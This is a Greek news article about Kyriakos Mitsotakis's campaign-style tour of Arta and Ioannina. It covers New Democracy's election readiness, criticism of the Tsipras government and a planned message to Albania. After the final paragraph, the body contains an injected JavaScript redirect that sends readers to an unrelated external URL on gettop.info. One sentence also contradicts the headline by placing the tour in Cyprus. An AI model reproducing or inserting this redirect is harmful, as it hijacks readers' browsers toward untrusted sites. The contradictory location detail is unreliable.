Σε εκλογική ετοιμότητα η ΝΔ – Περιοδεία Μητσοτάκη στην Ήπειρο

0
9

 

Αν και υπήρχε προγραμματισμένη περιοδεία στη Θράκη, ο Κυριάκος Μητσοτάκης άλλαξε τα σχέδιά του και πραγματοποιεί διήμερη περιοδεία στην Κύπρο, καθώς ο πρωθυπουργός επέλεξε τις ίδιες ημερομηνίες να περιοδεύσει στην περιοχή της Θράκης.

Ο κ. Μητσοτάκης θα επισκεφθεί την πόλη της Άρτας, όπου θα παρευρεθεί και στα εγκαίνια των γραφείων της ΝΟΔΕ Άρτας, ενώ το Σάββατο θα μιλήσει στις 19:30 στο ξενοδοχείο «Du Lac» στην πόλη των Ιωαννίνων. Στο πλαίσιο της περιοδείας του θα έχει συναντήσεις με παραγωγικούς φορείς και στελέχη της Τοπικής Αυτοδιοίκησης.

Ο πρόεδρος της ΝΔ θέλει να διατηρήσει τον κομματικό μηχανισμό σε κατάσταση εκλογικής ετοιμότητας και με τις περιοδείες του ενισχύει την επαφή του με τις τοπικές κοινωνίες.

Οι συνεργάτες του κ. Μητσοτάκη υποστηρίζουν πως ο πρωθυπουργός Αλέξης Τσίπρας, με την αναφορά του στην Κοινοβουλευτική Ομάδα του ΣΥΡΙΖΑ ότι «αποτυχία των διαπραγματεύσεων θα σήμαινε εκλογές και τέταρτο μνημόνιο», έβαλε και επισήμως το θέμα των εκλογών στο τραπέζι.

Εκτός από την κριτική για τα οικονομικά ζητήματα, από την Άρτα ο πρόεδρος τη ΝΔ θα απαντήσει στις πρόσφατες δηλώσεις του πρωθυπουργού της Αλβανίας Έντι Ράμα και θα απευθύνει αυστηρό μήνυμα προς την αλβανική κυβέρνηση, η οποία με τις εθνικιστικές θέσεις της επιχειρεί να ανοίξει όλα τα ελληνοαλβανικά θέματα. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here